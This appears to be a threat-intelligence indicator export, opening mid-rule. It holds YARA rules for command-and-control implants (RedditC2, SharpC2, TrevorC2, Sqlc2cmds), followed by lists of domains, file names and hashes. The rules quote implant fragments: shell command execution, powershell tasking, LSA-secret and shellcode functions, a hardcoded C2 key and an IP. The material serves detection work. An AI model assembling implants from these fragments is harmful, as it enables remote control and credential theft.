"f83bbf7318f982ddb457863cf2b45e13c402c2eff5bb1a4d5b8f074295ff46f9" or (((uint16(0) == 0x5654 or uint16(0) == 0x4136) and filesize < 600KB and (8 of them)) or (all of them)) }
Details	Yara rule	1	import "hash" rule RedditC2_ImplantUNIX { meta: description = "RedditC2 - implant.py" sha256 = "dba80b543f6d39f2d0631f6cfebef961259746e6f70fb0cf1431e85343ba7d32" strings: $s1 = " listener_session = subprocess.getoutput('hostname')" ascii fullword $s2 = " if(\"in:\" in top_level_comment.body and top_level_comment.id not in self.processed_comments):" ascii fullword $s3 = " i = Implant(client_id, client_secret, username, password, subreddit, listener_session, user_agent, xor_key)" ascii fullword $s4 = " output = subprocess.getoutput(command)" ascii fullword $s5 = " def __init__(self, client_id, client_secret, username, password, subreddit_name, listener_name, user_agent, xor_key):" ascii fullword $s6 = "def runTask(command):" ascii fullword $s7 = " ciphertext = \"powershell.exe \" + ciphertext[11:]" ascii fullword $s8 = "def decrypt(encoded_text, key):" ascii fullword $s9 = " self.processed_comments.append(top_level_comment.id)" ascii fullword $s10 = " print(\"[+] Received task to execute: \" + ciphertext)" ascii fullword $s11 = " self.processed_comments = []" ascii fullword $s12 = " if(command[:8] == \"download\"):" ascii fullword $s13 = " user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/" $s14 = "def encrypt(plaintext, key):" ascii fullword $s15 = "def xor_encrypt(plaintext, key):" ascii fullword $s16 = " user_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/" $s17 = " new_comment_body = comment_body.replace('in', 'executed')" ascii fullword $s18 = " self.subreddit.submit(self.listener_name, selftext=postContent)" ascii fullword $s19 = "def base64_decode(encoded_text):" ascii fullword $s20 = " output = runTask(command)" ascii fullword condition: hash.sha256(0, filesize) == "dba80b543f6d39f2d0631f6cfebef961259746e6f70fb0cf1431e85343ba7d32" or uint16(0) == 0x6d69 and filesize < 20KB and 8 of them }
Details	Yara rule	1	import "hash" rule RedditC2_ImplaintWin { meta: description = "RedditC2 - RedditAgent.exe" sha256 = "8b534d0f9f699d6a02aca559f2699d914b0b3f8749e0d206bece0fe09b92ccc6" strings: $s1 = "RedditAgent.exe" wide fullword $s2 = "set_UseShellExecute" ascii fullword $s3 = "[+] Created agent session: " wide fullword $s4 = "run hostname" wide fullword $s5 = "powershell" wide fullword $s6 = "myPassword" wide fullword $s7 = "myxorkey" wide fullword $s8 = ".NETFramework,Version=v4.7.2" ascii fullword $s9 = ".NET Framework 4.7.2" ascii fullword $s10 = "E:\\Work\\Analysis\\" ascii fullword $s11 = "[+] File uploaded successfully" wide fullword $s12 = "createPost" ascii fullword $s13 = "encryptedMessage" ascii fullword $s14 = "RedditAgent" wide fullword $s15 = "SubmitTextPost" ascii fullword $s16 = "GetSubreddit" ascii fullword $s17 = "postText" ascii fullword $s18 = "xorkey" ascii fullword $s19 = "listenerID" ascii fullword $s20 = "RedditSharp.Things" ascii fullword condition: hash.sha256(0, filesize) == "8b534d0f9f699d6a02aca559f2699d914b0b3f8749e0d206bece0fe09b92ccc6" or uint16(0) == 0x5a4d and filesize < 20KB and 8 of them }
Details	Yara rule	1	import "pe" import "hash" rule SharpC2Exe { meta: description = "SharpC2 - SharpC2.exe" sha256 = "162fc5cdd4ed03ab16da5edd076bc05e87dae1a41b053dddbcc8cac06baa8a63" strings: $s1 = "hostfxr.dll" wide fullword $s2 = "--- Invoked %s [version: %s, commit hash: %s] main = {" wide fullword $s3 = "This executable is not bound to a managed DLL to execute. The binding value is: '%s'" wide fullword $s4 = "SharpC2.dll" wide fullword $s5 = "D:\\a\\_work\\1\\s\\artifacts\\obj\\win-x64.Release\\corehost\\apphost\\standalone\\apphost.pdb" ascii fullword $s6 = "The managed DLL bound to this executable is: '%s'" wide fullword $s7 = "A fatal error was encountered. This executable was not bound to load a managed DLL." wide fullword $s8 = "Showing error dialog for application: '%s' - error code: 0x%x - url: '%s' - dialog message: %s" wide fullword $s9 = "Failed to resolve full path of the current executable [%s]" wide fullword $s10 = "https://go.microsoft.com/fwlink/?linkid=798306" wide fullword $s11 = "The managed DLL bound to this executable could not be retrieved from the executable image." wide fullword $s12 = "Could not load 'kernel32.dll': %u" wide fullword $s13 = "Download the .NET runtime:" wide fullword $s14 = "IsWow64Process2" ascii fullword $s15 = " - Installing .NET prerequisites might help resolve this problem." wide fullword $s16 = " - https://aka.ms/dotnet-core-applaunch?" wide fullword $s17 = "Bundle header version compatibility check failed." wide fullword $s18 = "Failed to load the dll from [%s], HRESULT: 0x%X" wide fullword $s19 = "The required library %s does not support relative app dll paths." wide fullword $s20 = "Call to IsWow64Process2 failed: %u" wide fullword condition: hash.sha256(0, filesize) == "162fc5cdd4ed03ab16da5edd076bc05e87dae1a41b053dddbcc8cac06baa8a63" or pe.sections[4].name == "_RDATA" and pe.imports("kernel32.dll", "TerminateProcess") and pe.imports("shell32.dll", "ShellExecuteW") and pe.imports("kernel32.dll", "IsDebuggerPresent") and pe.imports("kernel32.dll", "FindFirstFileExW") and uint16(0) == 0x5a4d and filesize < 500KB and 8 of them }
Details	Yara rule	1	import "hash" rule SharpC2Dll { meta: description = "SharpC2 - SharpC2.dll" sha256 = "ce0fe31e5c1fe918f766ab2e83daaac9e58cce3972c0872f8d1b2de03417528f" strings: $s1 = "SharpC2.dll" wide fullword $s2 = "RClient.Components.Pivots.ReversePortForwardTable+<OnReversePortForwardCreated>d__7" ascii fullword $s3 = "AClient.Components.Pivots.ReversePortForwardTable+<AddForward>d__5" ascii fullword $s4 = "RClient.Components.Pivots.ReversePortForwardTable+<OnReversePortForwardDeleted>d__6" ascii fullword $s5 = "DClient.Components.Pivots.ReversePortForwardTable+<DeleteForward>d__9" ascii fullword $s6 = "HClient.Components.Pivots.ReversePortForwardTable+<OpenCreateForward>d__8" ascii fullword $s7 = "__Blazor.Client.Components.Tasks.ProcessListing" ascii fullword $s8 = "C:\\Tools\\SharpC2\\Client\\obj\\Release\\net7.0-windows10.0.19041.0\\win10-x64\\SharpC2.pdb" ascii fullword $s9 = "IClient.Components.Pivots.ReversePortForwardTable+<OnInitializedAsync>d__4" ascii fullword $s10 = "KClient.Components.Pivots.CreateReversePortForward+<OnInitializedAsync>d__12" ascii fullword $s11 = "7Client.Components.Handlers.HostAFile+<UploadFiles>d__22" ascii fullword $s12 = "SHELLCODE" wide fullword $s13 = "Microsoft.ui.xaml.dll" ascii fullword $s14 = "0Client.Services.SharpC2Api+<GetHostedFiles>d__26" ascii fullword $s15 = "8Client.Services.SharpC2Api+<GetReversePortForwards>d__42" ascii fullword $s16 = "7Client.Services.SharpC2Api+<GetReversePortForward>d__43" ascii fullword $s17 = "__Blazor.Client.Components.Pivots.CreateReversePortForward" ascii fullword $s18 = ";Client.Components.Handlers.HttpHandlers+<OpenHostFile>d__10" ascii fullword $s19 = "9Client.Components.Events.WebLogs+<OnInitializedAsync>d__3" ascii fullword $s20 = "__Blazor.Client.Components.Pivots.ReversePortForwardTable" ascii fullword $s21 = "MemoryStream" ascii fullword condition: hash.sha256(0, filesize) == "ce0fe31e5c1fe918f766ab2e83daaac9e58cce3972c0872f8d1b2de03417528f" or uint16(0) == 0x5a4d and filesize < 2000KB and 8 of them }
Details	Yara rule	1	import "hash" rule SharpC2_API { meta: description = "SharpC2 - SharpC2.API.dll" sha256 = "720ded9560168b206152cceab0fcfa8138ad92311a0cf4b5bdf7ba0bd8074839" strings: $s1 = "SharpC2.API.dll" wide fullword $s2 = "C:\\Tools\\SharpC2\\SharpC2.API\\obj\\Release\\netstandard2.0\\SharpC2.API.pdb" ascii fullword $s3 = "get_PayloadType" ascii fullword $s4 = "get_ForwardPort" ascii fullword $s5 = "Payloads" ascii fullword $s6 = "get_BindPort" ascii fullword $s7 = "get_ForwardHost" ascii fullword $s8 = "<PayloadType>k__BackingField" ascii fullword $s9 = "set_PayloadType" ascii fullword $s10 = "/api/v1/payloads" wide fullword $s11 = "ReversePortForwardRequest" ascii fullword $s12 = "<ForwardPort>k__BackingField" ascii fullword $s13 = "get_ConnectAddress" ascii fullword $s14 = "ReversePortForwardResponse" ascii fullword $s15 = "get_ConnectPort" ascii fullword $s16 = "get_SourceAddress" ascii fullword $s17 = "set_ForwardPort" ascii fullword $s18 = "set_PipeName" ascii fullword $s19 = "SharpC2.API.Requests" ascii fullword $s20 = "SharpC2.API.Responses" ascii fullword condition: hash.sha256(0, filesize) == "720ded9560168b206152cceab0fcfa8138ad92311a0cf4b5bdf7ba0bd8074839" or uint16(0) == 0x5a4d and filesize < 100KB and 8 of them }
Details	Yara rule	1	import "pe" import "hash" rule TrevorC2_Win { meta: description = "TrevorC2 - tc2_client.exe" sha256 = "11d05c91663798116f6426c24166bdd648c519f6f95bdff4659dd56c575e7978" strings: $s1 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.37 E" $s2 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.37 E" $s3 = " VirtualQuery failed for %d bytes at address %p" ascii fullword $s4 = "%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p." ascii fullword $s5 = "magic_hostname=%s" ascii fullword $s6 = "Tr3v0rC2R0x@nd1s@w350m3#TrevorForget" ascii fullword $s7 = "%s?%s%s" ascii fullword $s8 = "<!-- oldcss=" ascii fullword $s9 = "killnow" ascii fullword $s10 = "sessionid=" ascii fullword $s11 = " VirtualProtect failed with code 0x%x" ascii fullword $s12 = "Cookie: sessionid=%s" ascii fullword $s13 = " Unknown pseudo relocation protocol version %d." ascii fullword $s14 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" $s15 = "192.168.1.175" ascii fullword $s16 = "connect" ascii fullword $s17 = "socket" ascii fullword $s18 = ":MZuYHcB<H" ascii fullword $s19 = "=UUUUw" ascii fullword $s20 = "ATUWVSHcY" ascii fullword condition: hash.sha256(0, filesize) == "11d05c91663798116f6426c24166bdd648c519f6f95bdff4659dd56c575e7978" or pe.imports("ws2_32.dll", "send") and pe.imports("kernel32.dll", "VirtualProtect") and pe.imports("msvcrt.dll", "rand") and pe.imports("kernel32.dll", "VirtualQuery") and uint16(0) == 0x5a4d and filesize < 200KB and 8 of them }
Details	Yara rule	1	import "hash" rule TrevorC2_UNIX { meta: description = "TrevorC2 - tc2_client.out" sha256 = "39391bffd11e6e525b02ea4cd5b3b4422c072126424b7031db346d260a4bd127" strings: $s1 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.37 E" $s2 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.37 E" $s3 = "magic_hostname=%s" ascii fullword $s4 = "Tr3v0rC2R0x@nd1s@w350m3#TrevorForget" ascii fullword $s5 = "%s?%s%s" ascii fullword $s6 = "<!-- oldcss=" ascii fullword $s7 = "killnow" ascii fullword $s8 = "sessionid=" ascii fullword $s9 = "Cookie: sessionid=%s" ascii fullword $s10 = ".note.gnu.build-id" ascii fullword $s11 = ".note.gnu.property" ascii fullword $s12 = ".note.ABI-tag" ascii fullword $s13 = ".eh_frame_hdr" ascii fullword $s14 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" $s15 = "192.168.1.175" ascii fullword $s16 = "connect" ascii fullword $s17 = "socket" ascii fullword $s18 = "Accept: text/html" ascii fullword $s19 = "_ITM_deregisterTMCloneTable" ascii fullword $s20 = "libc.so.6" ascii fullword condition: hash.sha256(0, filesize) == "39391bffd11e6e525b02ea4cd5b3b4422c072126424b7031db346d260a4bd127" or uint16(0) == 0x457f and filesize < 80KB and 8 of them }
Details	Yara rule	1	import "pe" import "hash" rule Sqlc2cmds { meta: description = "Sqlc2cmds - sqlc2cmds.dll" sha256 = "019fa586cbbdc875e72e614ab1917a93bcbc14bb0fa1731d0643b93c3763db2a" strings: $x1 = "C:\\Windows\\System32\\cmd.exe" wide fullword $s2 = "sqlc2cmds.dll" wide fullword $s3 = "WMI command executed" wide fullword $s4 = "\\\\127.0.0.1\\root\\cimv2:Win32_Process" wide fullword $s5 = "base64EncodedPayload" ascii fullword $s6 = "run_shellcode" ascii fullword $s7 = "run_command" ascii fullword $s8 = "run_command_ps" ascii fullword $s9 = "run_command_wmi" ascii fullword $s10 = "run_getusercon" ascii fullword $s11 = "send_http_get" ascii fullword $s12 = "execTsql" ascii fullword $s13 = "get_lsa_secrets" ascii fullword $s14 = "send_http_post" ascii fullword $s15 = "run_getprocs" ascii fullword $s16 = "entriesread" ascii fullword $s17 = "read_file_bin" ascii fullword $s18 = "fileContent" ascii fullword $s19 = "OriginatingHost" ascii fullword $s20 = "PostRequest" ascii fullword condition: hash.sha256(0, filesize) == "019fa586cbbdc875e72e614ab1917a93bcbc14bb0fa1731d0643b93c3763db2a" or uint16(0) == 0x5a4d and filesize < 40KB and 1 of ($x*) and 4 of them }
Details	Domain	2	new.target
Details	Domain	2	comp.id
Details	Domain	339	system.net
Details	Domain	64	go.microsoft.com
Details	Domain	107	aka.ms
Details	Domain	32	graph.microsoft.com
Details	Domain	14	content.dropboxapi.com
Details	Domain	6	api.dropboxapi.com
Details	Domain	1	bytes34694469519536141888238489627838134765625mapiter.next
Details	Domain	73	schemas.microsoft.com
Details	Domain	150	www.w3.org
Details	Domain	32	schemas.xmlsoap.org
Details	Domain	105	domain.com
Details	Domain	1	kali.host
Details	Domain	4	myapplication.app
Details	Domain	67	microsoft.windows
Details	Domain	1	agent.so
Details	Domain	9	sam.save
Details	Domain	7	security.save
Details	Domain	1	stage2core.so
Details	Domain	107	system.management
Details	Domain	2	dropper.py
Details	Domain	8	response.read
Details	Domain	1	res.read
Details	Domain	1	implant-core.py
Details	Domain	291	raw.githubusercontent.com
Details	Domain	6	keylogger.py
Details	Domain	4127	github.com
Details	Domain	1	this.pid
Details	Domain	228	system.io
Details	Domain	3	implant.py
Details	Domain	1	0client.services
Details	Domain	1	8client.services
Details	Domain	1	7client.services
Details	Domain	1	9client.components.events
Details	Domain	10	note.gnu.build
Details	Domain	1	note.gnu.property
Details	Domain	145	libc.so
Details	Domain	1	howto.thec2matrix.com
Details	Domain	360	attack.mitre.org
Details	File	1	airstrike-x64.exe
Details	File	1	airstrike-x86.exe
Details	File	748	kernel32.dll
Details	File	83	crypt32.dll
Details	File	146	wininet.dll
Details	File	1	wqjs_x64.exe
Details	File	1	wqjs_x86.exe
Details	File	2	new.tar
Details	File	39	amsi.dll
Details	File	8	b.dat
Details	File	1	popcalc.bin
Details	File	312	calc.exe
Details	File	13	client.dll
Details	File	2125	cmd.exe
Details	File	1	implant.exe
Details	File	2	tasks.exe
Details	File	6	pe.exe
Details	File	69	client.exe
Details	File	2	hostfxr.dll
Details	File	1	badger_x64.dll
Details	File	1	hk2pvh1a.dll
Details	File	1	c3oqgc2d.dll
Details	File	12	pe.dll
Details	File	1	badger_x64_rtlexituserthread.bin
Details	File	1	badger_x64_service.exe
Details	File	229	advapi32.dll
Details	File	1	badger_x64_stealth_rtlexituserthread.bin
Details	File	1	badger_x64_stealth_service.exe
Details	File	1	badger_x64_stealth_waitforsingleobject.bin
Details	File	1	badger_x64_waitforsingleobject.bin
Details	File	1	s-.rb
Details	File	1	badger_x86.dll
Details	File	1	f5m5inbs.dll
Details	File	1	badger_x86_rtlexituserthread.bin
Details	File	1	badger_x86_service.exe
Details	File	1	badger_x86_waitforsingleobject.bin
Details	File	1	syscall_stage_x64_rtlexituserthread.bin
Details	File	1	syscall_stage_x64_waitforsingleobject.bin
Details	File	1	syscall_stage_x86_rtlexituserthread.bin
Details	File	1	syscall_stage_x86_waitforsingleobject.bin
Details	File	1	noderelaydll_r64.dll
Details	File	1	noderelaydll_r86.dll
Details	File	3	api-ms-win-core-synch-l1-2-0.dll
Details	File	34	winhttp.dll
Details	File	1	onenotec2client.exe
Details	File	1	outlookc2client.exe
Details	File	1	onenotec2client.dll
Details	File	1	outlookc2client.dll
Details	File	9	system.config
Details	File	2	uration.config
Details	File	1	dbc2loader.dll
Details	File	1	dbc2_agent.exe
Details	File	1	lsadump.exe
Details	File	5	minidump.exe
Details	File	5	ntdsdump.exe
Details	File	1	samdump.exe
Details	File	1	screengrab.exe
Details	File	1	attributerpc.reg
Details	File	26	os.exe
Details	File	1	rof.dll
Details	File	1	i32.dll
Details	File	2	zoneinfo.zip
Details	File	1	agent_x64.exe
Details	File	1	agent_x86.exe
Details	File	1	exchanger_x64.exe
Details	File	1	exchanger_x86.exe
Details	File	31	schemas.xml
Details	File	2	dllhijack.dll
Details	File	1	mikedrop.exe
Details	File	1	mikec2.exe
Details	File	2	agent.dll
Details	File	2	drawing.dll
Details	File	57	system.dll
Details	File	130	ws2_32.dll
Details	File	1	northstarstager.exe
Details	File	165	reg.exe
Details	File	1	systemhealthcheck.exe
Details	File	1	_samdump.zip
Details	File	207	login.php
Details	File	1	getjuice.php
Details	File	1	petaqimplant.exe
Details	File	58	test.exe
Details	File	20	shellcode.bin
Details	File	1	c:\\windows\\temp\\1.txt
Details	File	4	powershell.ps1
Details	File	1208	powershell.exe
Details	File	59	csc.exe
Details	File	1	dynamiccode.exe
Details	File	1	fcomm.exe
Details	File	1	pbind.exe
Details	File	1	sharp_powershell_runner.exe
Details	File	15	dropper.exe
Details	File	1	dotnet2js.js
Details	File	3	dropper.ps1
Details	File	46	automation.ps
Details	File	5	a.key
Details	File	7	dropper.py
Details	File	14	urllib2.url
Details	File	1	implant-core.py
Details	File	5	keylogger.py
Details	File	1	implant-core.js
Details	File	3	shell.js
Details	File	1	apfell-jxa.js
Details	File	2	http.js
Details	File	364	console.log
Details	File	1	operatingsystemversionstring.js
Details	File	1	implant-core.ps1
Details	File	1	pbind.ps1
Details	File	1	aesmanaged.key
Details	File	2	implant.py
Details	File	1	redditagent.exe
Details	File	1	sharpc2.exe
Details	File	1	sharpc2.dll
Details	File	13	'kernel32.dll
Details	File	185	shell32.dll
Details	File	5	xaml.dll
Details	File	2	api.dll
Details	File	1	tc2_client.exe
Details	File	80	msvcrt.dll
Details	File	1	sqlc2cmds.dll
Details	File	48	c:\\windows\\system32\\cmd.exe
Details	Github username	18	empireproject
Details	Github username	6	its-a-feature
Details	md5	19	31d6cfe0d16ae931b73c59d7e0c089c0
Details	md5	1	554889e541574156415541544d89c457
Details	md5	1	554889e54157415641554d89c5415457
Details	md5	1	554889e55756534889cb4883e4f04881
Details	md5	1	554889e541574156415541544989d4ba
Details	md5	1	554889e5415541545756534883e4f048
Details	md5	1	558b7c2458033b893c24e8970400003b
Details	md5	1	AAAAAAAAAAAAAAAAAAAAAcC0AAAAAAAB
Details	sha1	1	fcd1a3d32b4c37a392c59ffe241b9cb973fde7f4
Details	sha1	1	14b06e3755cea0f291ea6246fc315b9b30388640
Details	sha256	1	be80b172b1e5fd000f5e638ebc8289b9940fa4ca51b75b0dd92ca633cbf1fcb9
Details	sha256	1	582886d688fb0e3573afa5f39c7984a2fe99d2ffb50543d354d9286c44dbd1ad
Details	sha256	1	68a4cd4fcf1f9a0e3a68ac19621adcb214f830c0854f7a9ad18ce453174d31a0
Details	sha256	1	f8675fea43f09741254d739ce072c0a73df9aa2e8abb670a4c94f2cda0315e03
Details	sha256	1	c703ffb19774194cbdd674c3feb12ef9942a242ab6569a6e153ba846cf4de852
Details	sha256	1	a14d6a30e886a19d47fad3e66b8dd5a6ead3e3a0bd7f8d3a6e001542740e9190
Details	sha256	1	6382401da4b33f85be0491f73d26080748821f25ce457dfee4c55c43308867c4
Details	sha256	1	147cf27ec2845164782b690977545697f77e7df3acc904118722d071eadad0aa
Details	sha256	1	039586f2d56ef93343980bf7734c350f6898acc457c1bae184391439c1820d86
Details	sha256	1	f5b1230386f9242f4c88edf893b7d97d901fb55d794c0f27a520d093b232e643
Details	sha256	1	d6fd0dd6a3a4bde08a2354e9298c1dacc6495c2173100b489e3c1d4526817a40
Details	sha256	1	3a9a917e6760f130a71ad17184b7f6ea67787ce0cbd9cfa0260e72b085e6aebe
Details	sha256	1	a72a9b039ddd668ce86022621c6d073048b0d4ab38beb0d9bc98287e5a14c206
Details	sha256	1	3b74e42f53475b6bb3792e9a8b5de22e6ab7a8037c10bfa2efca4d8fa2eb66be
Details	sha256	1	a453b3510ef0aa993b88f49d2a6f7a85bfab407033afb23340287b94eddff86d
Details	sha256	1	1e5a2a850f7cbfc5d306487ec75bbd436e5c8652304ad2b2a8a14b3386e63efd
Details	sha256	1	b33dc013e2168ebb37d8ac80dbcd778c6bda2ede4927b47ec95f32c87ad125fd
Details	sha256	1	23f0aeb7c61716e936820af851e7f5f04927be31cd540aba7717882161b000fb
Details	sha256	1	b67570680ffd7ebf5c8479e364c7a50ccf293170feb195172b9d907b5f171a88
Details	sha256	1	b57f0f8fe3a1682b31f61623ed224b387a56ffa21cba3cf0c75bb27e14536413
Details	sha256	1	ddd797f2afb0f0cf3e85532d937e475f3af778b6032b979f3b739904b2c7bc07
Details	sha256	1	21d2d2a5068827890e30ec5438de5ef22401cd67e5aab69e2a76881c842bd4a4
Details	sha256	1	defaacd4c05addae13998f3dce82e12e2f8f7c48af1e9061071f8157f01f7b61
Details	sha256	1	70488c62e7f56badbde76fb5a5d69fa6d7c1d4243f4a256106a7de2e5b4253ca
Details	sha256	1	86979aca65aef25f18132a2fc328f3d9234298e9d9c3b6cbd4a98a1ac7728c9d
Details	sha256	1	6d4c2d46f9fd7210da8df30879729a85287d38874dc84436e0f1f295b1072d09
Details	sha256	1	3fcc85c86db9e7f5e218d56af9f7ecabbf0284e447c3a70a14c89138d33d384b
Details	sha256	1	2ca4eb35ab5181c6170421413afccb8f10259a4f6460a28c5b57a92c91672307
Details	sha256	1	e9eccdb3b023ef3e8d267ff8f32e957b75711b5489cd5df3a000ab7cac53155e
Details	sha256	1	6d7ba1938fb5de743f867cf3104df89a5e3afed80c0c5861c77e7befc073f3d8
Details	sha256	1	1b13d5dab78b7b6c4d85ec5eb9e60854c37287384d7266d5c6583b8367f69583
Details	sha256	1	361979575789d281b536a0fac47928de0f7a77a41715271017897a521a601ff8
Details	sha256	1	9de63114a0173f1c599cb4035961ce400ffeea6a178f4a89ee542972dcd42154
Details	sha256	1	c7d36f2d9b3d532e892013a3a74b1dfde6430da4c799bb0b0812e01ad557a13c
Details	sha256	1	ab2ee8a4068329fe2731d82c7ffa31ea1262f67ea08afa58bcd3280b3fbf6324
Details	sha256	1	78f9d1e1a0a990515546391c9aea26ee425a0794051d732fff92ded2fa7ba5ce
Details	sha256	1	efa977d502ce60fd5d596b64ff5bd07bb7fa71eb956bc8ca1e33dd23b68a4d8c
Details	sha256	1	f5d0216c16287f0a84689ccfc732c6b4efcb686e2476b2dbd6aa5bb7802fd7df
Details	sha256	1	8be0f684decfa6e675d9c9b38590222139b088fa236651b73d1a01f5994a7666
Details	sha256	1	f7486405bd4ebfc2acf96c54202f536079bcbfc68b339550333bbed0ad03825c
Details	sha256	1	434a0fa442b1322e654142fe6a8bc35df3bcdebacb030ba68c4644f96df5caac
Details	sha256	1	a38370ca0d2421369f30c1bd83cc5a7d393ba86ee16ae277aab2008374e7b278
Details	sha256	1	b25288c94464546446ee1f9d3b361f979895392219b4316645945dbb6ed045b9
Details	sha256	1	144e66ef1ae2d6ec012ee88164141ed386b3240e0876ff63500203b665236511
Details	sha256	1	ac99a80277cd93f35df6a962fb13fe807a28328433e5d1d8765a13e9bc9562cc
Details	sha256	1	385c2e83b1f84acd9418c6cfaed52adc943d5b768ebe8dc731a73adf7edaa3a4
Details	sha256	1	34f4c3c83c8f700980f464f4f0b17e651c32dd2468fa93d6be65feccdefcb9d7
Details	sha256	1	32aa5df260b711119b95cd5e3b31464174c4e75388f8ef65976f77a3c2bfcfa1
Details	sha256	1	596a12d0c792569148bf5404d3074ba4fe0fff0f14f48f3244463d0d7a83f5ca
Details	sha256	1	2c24d72cf36f0abf83faa2d0fdd6728ed945ba9d0e9f787e98d8f25d07f1f384
Details	sha256	1	2b1f466ab2c78bb3f8fd287a7cb3c87922317fe7cd348aa699e57b285544c2a9
Details	sha256	1	14912bc7b7f9555231f3145f5ed81dd9776ff40d7a750e0908288406762acf31
Details	sha256	1	ca83ab01d46925f1d3a559affd3398d1cfe5d0abd637413cd5ae25f1fe7bd008
Details	sha256	1	85bc111b4d83b7fafd4c72832f23ebeadd1a9a74942aab072c928b1fc8b55625
Details	sha256	1	96d0bec95be57bb098632ab49eb8a2f23d3a7c9dc1e288a5fb990fa5ccec1bca
Details	sha256	1	0860153f607f4536b72d0ee821628077aa4e17f2465a00424b798c9e720505ef
Details	sha256	1	066857279d1e93a2ffdb1df8e1d509f6cc58a60083674e842a1e178cf1483904
Details	sha256	1	4f9e6582ebf1b3d5077d8a94b3696bc71f43984c7672c9eb696868f9dd711bca
Details	sha256	1	045312cb098438fe9dbcecf713766bff29d171726fb228de92ef54447564bbb4
Details	sha256	1	ba606da59063a837e704a49b065979ad4ea4b508c8600e520a8c69948332661b
Details	sha256	1	d5a3de19ef84c040a5b0058fb4fb2a036c9a8db7495763bcc7b7070f16cde967
Details	sha256	1	0c1d6b6f18811bda502df7302025950b189a75368185f9632ed96cc694ee4f8e
Details	sha256	1	195a255225c246f360d80e4ac4287cbcd4ca8025a68631dfa3c28b365cd5a25c
Details	sha256	1	cb72621b89c8a1d9686846183e86a09d7564d085927be2f483d739aeb60fcfdd
Details	sha256	1	eaf734a532b9312168cbcbbea00d08171546bc8560b7131904bd5ea77090e9d3
Details	sha256	1	cf654c92792fd8964025e9dd7dc2dc0181b15c4868134ec92ad4ac166dc99050
Details	sha256	1	2e8341a042e4c26fa6cfe2606075a56aa47587b7ca934789da3cb486cca871b7
Details	sha256	1	83c92e978a094fbc4d2c5f8d009a28da54c5677c1d55af61c3c2e2c33ea712af
Details	sha256	1	b059fc8cce2a0ca169dd3aae76c13d43a3fee0821a2bbb5b0d8b97d067c6eb08
Details	sha256	1	6a5605da5f7207b1b14b798e9428c2310633664eed53ce7bdb39a6847eff6609
Details	sha256	1	c337983b7eefbea3cc02e4d011398292ccbd475ba932ced40603a4a9a3927032
Details	sha256	1	28bcbcf21baaf1310fbda8a9e2d34d480d1f8e5f65d87abba6326a71565d1714
Details	sha256	1	933241f02ef81bef5f6b51ce3e5b3dbf242c829f899f64d2f10b0bad668a6424
Details	sha256	1	46be6cee13305cd4175e75a37308478ff48685665bbb062b8c665d672f0f4b0d
Details	sha256	1	9fb7870c7c1dc8d2dd61ba77e34efe580ad0151c9b59b201b17a45a211d8ff49
Details	sha256	1	f7f92158b53e6bcd8b2eb293e4802e2759c1943096e2da3d03486f36f053801c
Details	sha256	1	8ed63f7ea1a79dbf2cc9a338feff1dd4491a9daac38d4c86f67d7211783ae272
Details	sha256	1	3a29a9b0f0e5ff1b61fa052a2173987b9f990616043791826e7426df603c43d1
Details	sha256	1	df8474fe610372aff283b0429626e1663b27e7c651242fbc7687ca6fd2d45caa
Details	sha256	1	8ce3b90e96a7cfabb6b2b4fc692ea7ca8da105754eb06f662b572e5f549f280f
Details	sha256	1	f770e4b68e8d911e51a4de4cd84b36f290b7fcabe866063e26cee47afd98ba6c
Details	sha256	1	fc02c496d646b60fd70e2ad4be6e35b3f16aaf6c34ee47a7fb81d00cd54ab383
Details	sha256	1	a7fbb82f2606e3ec217d94fe83d4127e3a5a47290141875ff150243024fb2259
Details	sha256	1	9062d8c9e744b3963ea16f1df295fdf9e463902bfe37b8bae376a21a441851b4
Details	sha256	1	1193794ebfc3f9ae58e6bb443ecd783274285396c8b23533683e10da0c9d5c53
Details	sha256	1	e3823d2aaaf868aba237b034a13bf8ef6dd6cf0fc4c29f7e7c247d57b06ff61c
Details	sha256	1	a7f763a818db6da6433b4ffcafbbbd680597fee28bb97760ddd384caf0c25992
Details	sha256	1	33827cd5a6e15bbaf99e65f767e65e1b639f48d6b6bb7a6e9e8c8cf02355a1e7
Details	sha256	1	8653f19782f1e19e86caf6fdadc17790eb9d68ff34c8a249e9e9e26ba8000c88
Details	sha256	1	0b5c8f00eeaa6a63764f7f4807b53b37696882027443cf458895409c07aad26a
Details	sha256	1	6d520463f8563d6a296d22b6824c690c9b6de8121c9b6f08307947874667c5f2
Details	sha256	1	696e2d58b3a3d21ef422fc5103c4cc1a601f359ee1721eb9ecb099be95f229a7
Details	sha256	1	dd654eb75c1f3736d4b5282e7338a5efcbd7481fc7b46ec38a3ff0ea573c408e
Details	sha256	1	cb96cca9101899754efc33859353e0834496a98ee4381b1a9158c7403e1562d2
Details	sha256	1	03c10e261a138666a1c5cf9cb577e8d73e041b1dae0a3d1198d116e4c2b5dec3
Details	sha256	1	04ced8976f86801a23ee5fa1fb33f7cab5638039fb6d2a441a169784ce37adf9
Details	sha256	1	ce950ee11e27e0a95840fa12c878af19910aa82d1ccd5eb99ab99c4131571989
Details	sha256	1	fc454c2453d9cf6b64c0e6ffab76e6f26c584698a454c7cf2e07d96b11a29fb6
Details	sha256	1	ddc5047d6a8bb245644c5385ead8fa0d3b751f2aabf9e88e423e0b9862e65019
